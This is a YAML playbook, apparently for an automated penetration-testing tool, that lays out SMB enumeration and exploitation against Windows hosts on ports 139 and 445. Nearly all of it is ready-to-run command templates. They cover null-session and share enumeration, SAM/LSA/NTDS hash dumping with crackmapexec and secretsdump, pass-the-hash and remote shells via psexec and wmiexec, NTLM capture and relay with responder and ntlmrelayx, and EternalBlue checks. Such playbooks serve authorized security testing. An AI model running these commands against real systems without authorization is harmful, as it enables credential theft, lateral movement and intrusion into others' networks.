id: smb_pentesting
name: SMB Penetration Testing (Ports 139, 445)
description: Comprehensive Server Message Block enumeration, share enumeration, null sessions, and exploitation based on HackTricks methodology
category: enumeration
risk_level: critical
batch_compatible: true

triggers:
  - id: trigger_smb_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [139, 445] }
      protocol: { "$in": ["smb", "microsoft-ds", "netbios-ssn", "tcp"] }
    required_count: 1
    priority: 6
    description: Triggers when SMB/NetBIOS service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: smb_version_detection
    name: SMB Version and OS Detection
    description: Identify SMB version and operating system information
    order: 1
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV -p 139,445 --script smb-protocols,smb-os-discovery {host} -oN smb_version_{host}.txt"
        preferred: true
        notes: "Detect SMB version, OS, and supported protocols"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host}"
        preferred: true
        notes: "Quick SMB enumeration with NetExec/CrackMapExec"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "Metasploit SMB version scanner"
        requires_elevation: false

  - id: smb_null_session
    name: SMB Null Session Enumeration
    description: Test for anonymous/null session access
    order: 2
    timeout_seconds: 180
    commands:
      - tool: enum4linux
        platforms: [linux, macos]
        command: "enum4linux -a {host}"
        preferred: true
        notes: "Comprehensive SMB enumeration via null session"
        requires_elevation: false
      - tool: enum4linux-ng
        platforms: [linux, macos]
        command: "enum4linux-ng -A {host}"
        preferred: true
        notes: "Next-gen enum4linux with better features"
        requires_elevation: false
      - tool: smbclient
        platforms: [linux, macos, windows]
        command: "smbclient -L //{host} -N"
        preferred: true
        notes: "List shares with null session"
        requires_elevation: false
      - tool: smbmap
        platforms: [linux, macos, windows]
        command: "smbmap -H {host}"
        preferred: true
        notes: "Enumerate shares with null credentials"
        requires_elevation: false

  - id: smb_share_enumeration
    name: SMB Share Enumeration
    description: Enumerate accessible shares and permissions
    order: 3
    timeout_seconds: 180
    commands:
      - tool: smbmap
        platforms: [linux, macos, windows]
        command: "smbmap -H {host} -u {username} -p {password}"
        preferred: true
        notes: "Enumerate shares with credentials"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -p {password} --shares"
        preferred: true
        notes: "List all accessible shares"
        requires_elevation: false
      - tool: smbclient
        platforms: [linux, macos, windows]
        command: "smbclient -U '{username}%{password}' -L //{host}"
        preferred: false
        notes: "List shares with smbclient"
        requires_elevation: false

  - id: smb_user_enumeration
    name: SMB User and Group Enumeration
    description: Enumerate domain users and groups
    order: 4
    timeout_seconds: 180
    commands:
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -p {password} --users"
        preferred: true
        notes: "Enumerate all domain users"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -p {password} --groups"
        preferred: true
        notes: "Enumerate all domain groups"
        requires_elevation: false
      - tool: rpcclient
        platforms: [linux, macos]
        command: "rpcclient -U '' -N {host} -c 'enumdomusers'"
        preferred: true
        notes: "Enumerate users via RPC with null session"
        requires_elevation: false
      - tool: lookupsid
        platforms: [linux, macos, windows]
        command: "lookupsid.py -no-pass {host}"
        preferred: false
        notes: "Enumerate local users via SID brute forcing"
        requires_elevation: false

  - id: smb_share_access
    name: SMB Share Content Access
    description: Access and download files from SMB shares
    order: 5
    timeout_seconds: 300
    commands:
      - tool: smbmap
        platforms: [linux, macos, windows]
        command: "smbmap -H {host} -u {username} -p {password} -R"
        preferred: true
        notes: "Recursively list all files in shares"
        requires_elevation: false
      - tool: smbclient
        platforms: [linux, macos, windows]
        command: "smbclient //{host}/{share} -U '{username}%{password}' -c 'recurse;ls'"
        preferred: true
        notes: "Recursively list files in specific share"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -p {password} -M spider_plus --share '{share}'"
        preferred: false
        notes: "Spider and enumerate share contents"
        requires_elevation: false

  - id: smb_password_policy
    name: SMB Password Policy Enumeration
    description: Extract domain password policy
    order: 6
    timeout_seconds: 60
    commands:
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -p {password} --pass-pol"
        preferred: true
        notes: "Enumerate password policy (lockout thresholds, min length, etc.)"
        requires_elevation: false
      - tool: enum4linux
        platforms: [linux, macos]
        command: "enum4linux -P {host}"
        preferred: false
        notes: "Extract password policy via enum4linux"
        requires_elevation: false

  - id: smb_vulnerability_scan
    name: SMB Vulnerability Scanning
    description: Scan for known SMB vulnerabilities (EternalBlue, etc.)
    order: 7
    timeout_seconds: 180
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061 {host}"
        preferred: true
        notes: "Check for critical SMB vulnerabilities (EternalBlue, etc.)"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u '' -p '' -M ms17-010"
        preferred: true
        notes: "Check for MS17-010 (EternalBlue) with CrackMapExec"
        requires_elevation: false

  - id: smb_hash_dump
    name: SMB Hash Dumping
    description: Dump SAM/NTDS hashes with admin credentials
    order: 8
    timeout_seconds: 300
    commands:
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -p {password} --sam"
        preferred: true
        notes: "Dump local SAM hashes (requires local admin)"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -p {password} --lsa"
        preferred: true
        notes: "Dump LSA secrets (requires local admin)"
        requires_elevation: false
      - tool: secretsdump
        platforms: [linux, macos, windows]
        command: "secretsdump.py {domain}/{username}:{password}@{host}"
        preferred: true
        notes: "Dump SAM, LSA, and NTDS.dit hashes"
        requires_elevation: false

  - id: smb_command_execution
    name: SMB Remote Command Execution
    description: Execute commands via SMB with valid credentials
    order: 9
    timeout_seconds: 120
    commands:
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -p {password} -x 'whoami'"
        preferred: true
        notes: "Execute CMD command via SMB"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec smb {host} -u {username} -H {hash} -x 'whoami'"
        preferred: true
        notes: "Pass-the-hash command execution"
        requires_elevation: false
      - tool: psexec
        platforms: [linux, macos, windows]
        command: "psexec.py {domain}/{username}:{password}@{host}"
        preferred: true
        notes: "Interactive shell via PsExec"
        requires_elevation: false
      - tool: wmiexec
        platforms: [linux, macos, windows]
        command: "wmiexec.py {domain}/{username}:{password}@{host}"
        preferred: true
        notes: "Semi-interactive shell via WMI (stealthier than psexec)"
        requires_elevation: false

  - id: smb_ntlm_relay
    name: SMB NTLM Relay Attack
    description: Capture and relay NetNTLM hashes
    order: 10
    timeout_seconds: 300
    commands:
      - tool: responder
        platforms: [linux, macos]
        command: "responder -I eth0 -v"
        preferred: true
        notes: "Capture NetNTLM hashes from network traffic"
        requires_elevation: true
      - tool: ntlmrelayx
        platforms: [linux, macos]
        command: "ntlmrelayx.py -tf targets.txt -smb2support"
        preferred: true
        notes: "Relay captured NTLM authentication to targets"
        requires_elevation: false

metadata:
  tools:
    - nmap
    - crackmapexec
    - smbclient
    - smbmap
    - enum4linux
    - enum4linux-ng
    - rpcclient
    - impacket
    - metasploit
    - responder
  cves:
    - CVE-2017-0143  # MS17-010 EternalBlue
    - CVE-2017-0144  # MS17-010 EternalBlue
    - CVE-2017-0145  # MS17-010 EternalBlue
    - CVE-2008-4250  # MS08-067 Server Service RCE
    - CVE-2010-2729  # MS10-061 Print Spooler
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
    - https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
  techniques:
    - Null session enumeration
    - Share enumeration and file access
    - User and group enumeration
    - Password policy extraction
    - SAM/LSA/NTDS hash dumping
    - Remote command execution (psexec, wmiexec, smbexec)
    - NTLM relay attacks
    - Pass-the-hash attacks
  batch_commands:
    crackmapexec_scan: "crackmapexec smb {targets} --gen-relay-list relay_targets.txt"
    nmap_vuln: "nmap -p 445 --script smb-vuln-* -iL {targets_file} -oN smb_vulns.txt"
    enum4linux: "parallel -j 10 'enum4linux -a {} > enum4linux_{}.txt' :::: {targets_file}"
  notes: |
    SMB is a critical service in Windows environments and often provides:
    - Domain enumeration (users, groups, machines, password policies)
    - File access (potentially containing credentials, config files, source code)
    - Lateral movement opportunities (PsExec, WMI, RDP, etc.)
    - Privilege escalation paths (token impersonation, relay attacks)

    Always check for:
    - Null/anonymous sessions
    - Weak or default credentials
    - Overly permissive share ACLs
    - Sensitive files in shares (Registry.xml, web.config, unattend.xml)
    - MS17-010 (EternalBlue) on unpatched systems
